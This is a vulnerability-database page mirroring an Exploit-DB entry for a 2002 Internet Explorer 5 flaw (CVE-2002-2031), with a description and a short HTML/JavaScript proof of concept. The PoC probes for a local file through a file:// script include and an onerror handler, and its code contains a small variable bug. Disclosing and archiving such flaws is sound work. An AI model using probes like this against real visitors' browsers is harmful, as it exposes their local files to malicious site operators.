Lucene search
+L

Microsoft Internet Explorer 5 - JavaScript Local File Enumeration (1)

🗓️ 03 Jan 2002 00:00:00Reported by Tom MicklovitchType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 24 Views

Microsoft Internet Explorer 5 has a vulnerability disclosing sensitive information via local file enumeration.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2002-2031
14 Jul 200504:00
cve
cvelist
Cvelist
CVE-2002-2031
14 Jul 200504:00
cvelist
exploitdb
Exploit DB
Microsoft Internet Explorer 5 - JavaScript Local File Enumeration (2)
3 Jan 200200:00
exploitdb
nvd
NVD
CVE-2002-2031
31 Dec 200205:00
nvd
redhatcve
RedhatCVE
CVE-2002-2031
21 May 202520:30
redhatcve
source: https://www.securityfocus.com/bid/3779/info

Microsoft Internet Explorer is prone to a vulnerability which may disclose sensitive information to a malicious webmaster.

When script code includes a file outside of the document it is embedded in and the file does not exist, the onError event handler will run script if it is enabled. This script can determine whether the file to be included exists or not. This can be used to verify the existence of files on client hosts by creating webpages that include files from the local host using 'file://'.

<html>
<head>
<script language="javascript">
<!--
var fileExists = false;
function yes()
{
alert("the file exists.");
yes = true;
}

function no()
{
if(!fileExists)
{
alert("the file does not exist.");
}
}

window.onerror = yes
window.onload = no
//-->
</script>
<script language="javascript"
src="file://c:\autoexec.bat"></script>
</head>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Sep 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.20513
24